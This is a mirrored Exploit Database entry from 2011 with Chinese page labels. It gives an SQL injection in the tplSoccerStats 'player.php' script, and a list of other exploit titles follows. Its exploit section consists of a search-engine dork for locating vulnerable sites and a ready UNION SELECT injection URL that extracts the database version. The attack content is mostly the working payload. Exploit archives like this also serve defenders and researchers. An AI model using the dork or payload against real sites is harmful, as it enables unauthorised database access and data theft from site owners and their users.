tplSoccerStats – ‘player.php’ SQL Injection

Exploit Database
10 阅读

作者： AtT4CKxT3rR0r1ST

日期： 2011-02-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/16214/

tplSoccerStats (player.php) Sql Injection Vulnerability 
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
.:. Dork : intitle:"Powered by tplSoccerStats" inurl:"player.php"
.:. Home : http://www.sec-risk.com/vb/
####################################################################

===[ Exploit ]===

www.site.com/player.php?id==null[Sql]

www.site.com/player.php?id=null'+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10-- -
####################################################################

last Exploits
tplSoccerStats – ‘player.php’ SQL Injection的更多信息

School ERP Pro 1.0 – ‘es_messagesid’ SQL Injection：
Mitsubishi Electric smartRTU / INEA ME-RTU – Unauthenticated Configuration Download：
PHPKit 1.6.1 R2 – ‘overview.php’ SQL Injection：
nuBuilder – Remote File Inclusion：
eLouai’s Force Download Script – Arbitrary Local File Download：
Webify Business Directory – Arbitrary File Deletion：
Life Insurance Management System 1.0 – Multiple Stored XSS：
Joomla! Component JBDiary – Blind SQL Injection：